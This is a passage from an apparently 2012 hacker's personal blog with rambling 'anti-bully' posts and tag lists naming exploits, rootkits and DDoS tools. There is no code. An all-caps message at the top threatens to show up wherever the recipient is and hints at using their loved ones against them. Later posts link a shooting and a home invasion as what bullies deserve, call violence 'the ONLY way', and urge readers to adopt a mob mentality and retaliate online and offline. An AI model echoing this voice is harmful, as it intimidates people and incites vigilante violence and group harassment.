YOUR REP THE SAME BITCH.

IT IS NOT HARD AND AS I SAID, I JUST HAVE TO SHOWUP TO YOUR FUCKING *ANYWHERE* I LIKE, COZ, IT IS A PUBLIC FUCKING WORLD…AND, SPEAK NICELY TO YOU

HEY, I DID NOT SAY ANYTHING ABOUT BEATINGS ETC… I JUST SIMPLY MENTIONED, YOUR PRIORITYS, YOUR WANTS AND LOVES, AND, HOW EASILY THOSE, CAN BE USED AGAINST PEOPLE NOWDAYS AND ALWAYS DAYS.

comments: 0 » tags: bots MSDN SDK sdk tutorial botmaking vs6 cpp c++, code perl cpp vb vc coding coder coders coding mad crazy php python g++ gcc cc gdb linux linux-stuff, econet sendpage sploitz xploit scanning sp 2.6.18-164.xen 2.6.18 kernel 2.6-kernel 2.4-kernel grsec bot botpacks medge3 medge2 medge fatalz, Eggdrop irc ircd ctcp bug exploit mirc bouncer socks psyBNC eggy wraith botpack eggypack eggy eggdropz, exploit ac1db1tch3z ABftw hack hacked owned own3d 0wn pwnd s3l1nux selinux ldt idt wtf-is-this-poc PoC code, exploit bzexe bzip2 race condition poc code, firewall anti-ddos ddos anti-attack attack connection limits ipv6 iptables ip6tables ruby fast ruby, root rootkit hack hacker code exploit, test code c cpp burnt food, xchmod vladz race-condition race condition exploit buffer-overflow overflows exploiting blackhat googleme-first google spiders bots fuckoff

[Bully Breakdown]: Well knowledged IT_Sec (father) of daughter,shoots up her laptop, for she was a bully…

Posted on 11th February 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

I guess the video will say it all eh ?

This was the FATHER of a Bullying,rebellious young FaceBook teenager… she must have had big balls, tryin to get this over her own dad :S

Also, this is an example of the worlds response to Bullys, and the BullyBreakdown project , of wich I am the Author…

You will find MANY more like this, and this hit the news here.. Channel.10/7/9 you know… it aint *small* ,and it aint behind any monitors anymore… just remember that (s)kids

This will only get worse, if these want to be SOPA and DARPA people, get theyre way ….

Anyhow folks, enjoy a GREAT vid!

XD / worldwide … army of unrepentant nomadz

On Behalf of MMA (Au) and Dana (MMA Usa), and all against the bullys online!

comments: 0 »

BULLY BREAKDOWN! This is the gospel of the ….

Posted on 31st January 2012 in Android, Codes, Exploits, Papers, Uncategorized

Here.. is some help, with how i have watched things, and how i react… i am not in any way affiliated with the people shown below.

BUT, i can say, big brothers are now online, and, will punish the naughy boys and gals.

This will br brutal, and significant, assimilation and annihalation of small groups who try to destroy, people and places, they NEVER know EVER existed…and will still remain, unexistant….

Brothers In Arms ..

Remember what haoppens ONLINE, could also happen OFFLINE…

In times of war…

http://www.fiveaa.com.au/article_man-shot-at-munno-para-west_111377

Shit happens…

^^ For those who annoy … tomuch… sometimes this is the ONLY way…

In the end, it is basically like this for the Bullys ..

http://www.break.com/index/the-best-of-the-worst-parkour-edition-2294595

http://video.couriermail.com.au/2189968224/Horrifying-home-invasion?area=videoindex7

*********************************************************************************************************Poor poor, want to be Bullys, only get ONE thing.

http://video.couriermail.com.au/2191276513/Comanchero-home-movie?area=videoindex4

^^RESPECT

RECURSIVE FORCE!

Now the power within you, is maybe alittle stronger… dont be afraid of ONLINE and OFFLINE BULLYS ,use Theyre own weapons against them, and may peace be with you all, especially for the youth…

And, for all the rest, I guess you should be LOYAL and follow somethings, you see offline, online…

Remember, treat others how YOU would want to be treated.. or face the wraths of many now empowered people…

JACK THE RIPPER

R.I.P Giove ..

comments: 29 » tags: bullys shuld never be given anything but, misery... they are destroying the network megaupload was an example..

Words of Wisdom , things you MUST know…

Posted on 29th January 2012 in Android, Codes, Exploits, Papers, Uncategorized

My name, I will not give you… but, this is as good as…

I was 11 when i first used commodore64,then became trained by someone even younger than me, to run wares, he was 10, and gave me EVERY compnentry he had, to show nme what i needed…
I am FUGiTiVE.ACU (Australian Crackers United) ,later then formed with ParaDOX/ANGELS,then started a splinter cell group here…. I owned at&t, there was NO laws then, so theyre method was brutality.
Simple, they rang my house at atall times of day, even to speak with me (CiA) and usa feds, and, eventually, the got to my father…. this is when, i was forced, with Police in to, to sell the pc in FRONT of theyre eyes, and never come back, ever… this is things, only the very old members, will know, and this happened… look for me on any .AU warez from amiga500, the Firestarters was the first group i was in….

Anyhow, this is NOT about hate…. it is about allowing people to control you.
I was a sleeper cell unit/cluster of friends VERY close and only commune IRL, you people should use the old team codes… believe me.. the law will not hurt you…if your trained.
To some of the people who only can ddos, i understand, but i beg, please ask the elders, to be schooled, dont fight.. for we will loose the most precious FUCKUP in history…
USE theyre weaponry and mistakes, this is the way of the warrior online, for if you attack only with ddos etc, this will not get voiced, but if you school them, they really are bound by laws, thru France,Italy,Brasil/Rio/Barcelona,UK…Is splinter groups i PERSONALLY trained with mouse_ , for this reason….
NOW, we are awake… and my teams, will start to move in on anti warez..

Be strong, as it will look like shit for abit,but as i mentioned, when sleepers movie was made, it was nothing todo with this, we borrowed theyre names,a s they waited, and had vengeful justice,and lived through it, the deaths of 2, still madesure ONE was OK.
This is the MOB mentality you MUST adopt, and it is HARD… but, ask Mouse_ how hard i am, ask others how hard I am, and why i am here..
I am no idiot…mark my words.. be strong, UNITE, for united you stand, alone you fall, learn to code alittle, not much, as they have alredy messed it somuch, that, there is other groups atwork now, picking them to pieces, reverse engineer skill, is not a base of hacking but, it is often the most poweful weapon ya have… stay stong aussies, and unite as i did… this is NOT hate, this is love, for my country, my voice, and, the Net.
XD / FUGiTIVE

Remeber at the end of “SLEEPERS” (Movie) ,who did win ???

nme, and anyone else trying to ring me, dont.. there is reasons, think later buddys….

comments: 5 »

Help pay for xds lawyer fees.

Recent Posts

Categories

Archives

Blogroll

Links

Meta